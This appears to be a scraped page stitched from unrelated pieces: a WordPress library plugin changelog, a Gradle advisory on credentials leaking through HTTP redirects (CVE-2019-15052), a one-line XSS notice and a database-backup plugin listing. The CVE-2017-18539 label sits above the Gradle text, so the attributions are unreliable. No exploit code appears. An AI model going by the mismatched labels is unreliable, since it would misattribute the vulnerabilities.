**3.2.7.7**

*   Front side update: minor short code updates.

**3.2.7.6**

*   Front side update: short codes and front style sheet updates.

**3.2.7.5**

*   Localization updates. Minor database update.

**3.2.7.4**

*   Localization updates, including localized date validation.

**3.2.7.3**

*   Localization updates.

**3.2.7.2**

*   Added missing style definition for weblib-item-table.

**3.2.7.1**

*   Changed default for publication date to 1900-01-01 to deal with possible  
    MySQL/PHP error on activation (out of range default for publication date).

**3.2.7**

*   Fixed up the jQuery UI, smoothed out the rough edges (eg got all of the  
    proper stylesheet and image support). Additional (minor) localization  
    updates.

**3.2.6.1**

*   Way too much fun with resizable iframes and jQuery: put the Amazon search  
    thingy in an iframe and put the iframe into a resizable (via jQuery) div.  
    sort of works, but still a little funky.
*   Fixed various minor typos: broken tags, spelling errors, missing  
    localizations.

**3.2.6**

*   Changed AWS insert buttons to be a small icon instead of “bulky” text buttons
*   Updated localization, added Italian translation.

**3.2.5.3**

*   Add insert / add buttons to Amazon item loopup. (Experimental!)

**3.2.5.2**

*   Remove roles on deactivate.
*   Make title the default on Amazon searches.

**3.2.5.1**

*   Move loading of Localization files to the correct place

**3.2.5**

*   Added missing contextual help page.
*   Fixed silly typo error in the collection bulk delete code.

**3.2.4**

*   Added code to collection and patron delete functions to clear out orphaned  
    holds and checkouts.
*   Added Collection Database Maintenance page, containing a button to clear out  
    orphaned holds and checkouts.

**3.2.3**

*   Updated the support/donation links (added localization).
*   Added an ‘About’ page.

**3.2.2**

*   Added donation buttons and links.
*   Updated localization.

**3.2.1**

*   Minor bug fix with Call Number column.

**3.2**

*   Added Call Number column to collection database.
*   Updated localization.

**3.1**

*   Minor documentation update for the contextual help for the options page.

**3.0**

*   Major code rewrite. All of the WP\_List\_Tables redone properly and  
    separated into separate source files. Adding the per\_page screen options  
    properly.  
    Added bulletproofing to the collection import code: barcodes are now checked  
    and fixed as they are added — no more ‘broken’ databases!

**2.6.3.2**

*   Various security fixes.

**2.6.3.1**

*   Include debugging code.

**2.6.3**

*   Fixed minor bug with telephone number validation when adding patrons.

**2.6.2**

*   Fixed database creation to deal with MS-Windows / MySQL weirdness  
    (no default allowed for BLOB/TEXT — error under MS-Windows, warning  
    under Linux).

**2.6.1**

*   Add localization to the JavaScript code

**2.6**

*   Add localization to the PHP code

**2.3**

*   Fixed a SQL syntax error.
*   Added ‘upload\_files’ capability to Librarian and SeniorAid roles (allows  
    them to upload images for items in the collection).
*   Fixed the scoping of variables in the JavaScript code.

**2.2.2**

*   Added something to the FAQ section.

**2.2.1**

*   Fixed a problem with the search form short code.

**2.2**

*   Fixed a problem with short PHP tags.

**2.1**

*   Updated to include the AssociateTag parameter required by Amazon.

**2.0**

*   Initial public release.

CVE-2017-18539: WebLibrarian

The HTTP client in Gradle before 5.6 sends authentication credentials originally destined for the configured host. If that host returns a 30x redirect, Gradle also sends those credentials to all subsequent hosts that the request redirects to. This is similar to CVE-2018-1000007.

This issue is to discuss CVE-2019-15052 and answer any questions that people may have.

Our official advisory can be found here: GHSA-4cwg-f7qc-6r95

**CVSSv3 Score**

We believe that this vulnerability will receive the same CVSSv3 score as the cURL vulnerability listed below.

As such, we have provided the following _estimated_ scoring:

**CVSS v3.0 Severity and Metrics:**

**Base Score:** 9.8 CRITICAL  
**Vector:** AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Impact Score:** 5.9  
**Exploitability Score:** 3.9

**Additional context**

cURL had this same vulnerability which was fixed in cURL v7.58.0  
Their disclosure can be found here:  
https://curl.haxx.se/docs/CVE-2018-1000007.html

**Original Report**

Below is the contents of the original vulnerability disclosure reported by @uriahcarpenter.

**Expected Behavior**

If basic authentication is configured for a Maven repository credentials are _only_ sent to the hostname configured.

**Current Behavior**

If the Maven repository responds with an HTTP redirection response (e.g. 302/304/307) to a different hostname Gradle _includes_ the basic authorization header. Some may consider this an information disclosure security issue.

**Context**

Some Maven repositories may perform HTTP redirects to serve large-binaries from via a CDN; an example of this is Artifactory's Direct Cloud Storage Download feature. This Artifactory feature ultimately uses a S3 signed URL as a HTTP redirect. However the S3 request fails because there is authorization in the URL _and_ Gradle sends the _unrelated_ basic authentication header.

**Steps to Reproduce**

I have created a full working example of this issue:

*   Clone https://github.com/Widen/gradle-s3
*   Execute ./gradlew classes --no-daemon --refresh-dependencies
*   Build will fail with a 400 response error

The underlaying cause of the 400 error is slightly difficult to diagnose because Gradle does not output the text of the response, so I'm including screen shots of the request and responses using a local HTTP proxy.

Request and response to my _fake_ Maven repository:

Request and response to S3 URL. Note the actual _bug_ is that the header Authorization = Basic Zm9vOmJheg== is being sent to the server gradle-s3-auth-issue.s3.amazonaws.com.

**Environment**

Sample project is configured to use the latest Gradle release; 5.5.1.

Please feel free to leave any questions you may have below.

Please report any new security vulnerabilities to security@gradle.com.

CVE-2019-15052: [DISCUSSION] CVE-2019-15052: Repository authentication sent to server of HTTP redirection response · Issue #10278 · gradle/gradle

The wp-database-backup plugin before 5.1.2 for WordPress has XSS.

*   Details
*   Reviews
*   Installation
*   Development

WP Database Backup plugin helps you to create Database Backup and Restore Database Backup easily on single click. Manual or Automated Database Backups And also store database backup on safe place- Dropbox,FTP,Email,Google drive, Amazon S3

**Features**

*   Create Database Backup  
    WP Database Backup plugin helps you to create Database Backup easily on single click.
*   Auto Backup  
    Backup automatically on a repeating **schedule**
*   Download backup file direct from your WordPress dashboard
*   Easy To Install(Very easy to use)  
    WP Database Backup is super easy to install.
*   Simple to configure(very less configuration), less than a minute.
*   Restore Database Backup  
    WP Database Backup plugin helps you to Restore Database Backup easily on single click.
*   Multiple storage destinations
*   Store database backup on safe place- **Dropbox, Google drive, Amazon s3,FTP,Email**
*   Reporting- Sends emailed backups and backup reports to any email addresses
*   **Exclude Table**
*   Database backup list pagination
*   Search and Replace in database backup file.
*   Search backup from list(Date/ Database Size)
*   Sort backup list (Date/ Database Size)
*   Save database backup file in zip format on local server And Send database backup file to destination in zip format
*   Documentation

**Support**

*   https://backupforwp.com/support

1.  Download the plugin file, unzip and place it in your wp-content/plugins/ folder. You can alternatively upload it via the WordPress plugin backend.
2.  Activate the plugin through the ‘Plugins’ menu in WordPress.
3.  WP Database Backup menu will appear in Dashboard->Backups. Click on it & get started to use.

**How to create database Backup?**

Follow the steps listed below to Create Database Backup

Create Backup:

1) Click on Create New Database Backup

2) Download Database Backup file.

**How to restore database backup?**

Restore Backup:

Click on Restore Database Backup

OR

1)Login to phpMyAdmin

2)Click Databases and select the database that you will be importing your data into.

3)Across the top of the screen will be a row of tabs. Click the Import tab.

4)On the next screen will be a location of text file box, and next to that a button named Browse.

5)Click Browse. Locate the backup file stored on your computer.

6)Click the Go button

**Always get an empty (0 bits) backup file?**

This is generally caused by an access denied problem.

You don’t have permission to write in the wp-content/uploads.

Please check if you have the read write permission on the folder.

**On Click Create New Database Backup it goes to blank page**

if the site is very large, it takes time to create the database backup. And if the server execution time is set to low value, you get go to blank page.  
There may be chance your server max execution time is 30 second. Please check debug log file.  
You will need to ask your hosting services to increase the execution time and the plugin will work fine for large data.  
You can also try to increase execution time. Please make below changes – Add below line

php.ini

max\_execution\_time = 180 ;

Also Please make sure that you have write permission to Backup folder and also check your log file.

**Want more features?**

If you want more features then please contact us at

Very good tool, it does its job as describe.

Easy to use UI and just does the job nicely ! Great Plugin 🙂

Great backup plugin with an overall great and useable interface.

I don't know why, but with Wordpress 5.9 this plugin is broken.

WP Database Backup is all that you need to make database backups. This is really an amazing plugin, probably the best plugin to back up a WordPress database. I really love the scheduling feature. Just a question, does it offer an API to schedule the backups using an external cron? It would be great if you can trigger the automatic backups using the cron of the server instead of the inbuilt WP cron. Because all the pages are served by server cache, I would prefer an external cron.

Does not restore the database. Had to restore it using phpmyadmin. Scheduler does not work as intended. Just keep taking hourly backups. You can't set it to twice daily or daily etc. Author does not respond to queries in support forum on time.

Read all 72 reviews

“WP Database Backup – Unlimited Database & Files Backup by Backup for WP” is open source software. The following people have contributed to this plugin.

Contributors

Tag

#amazon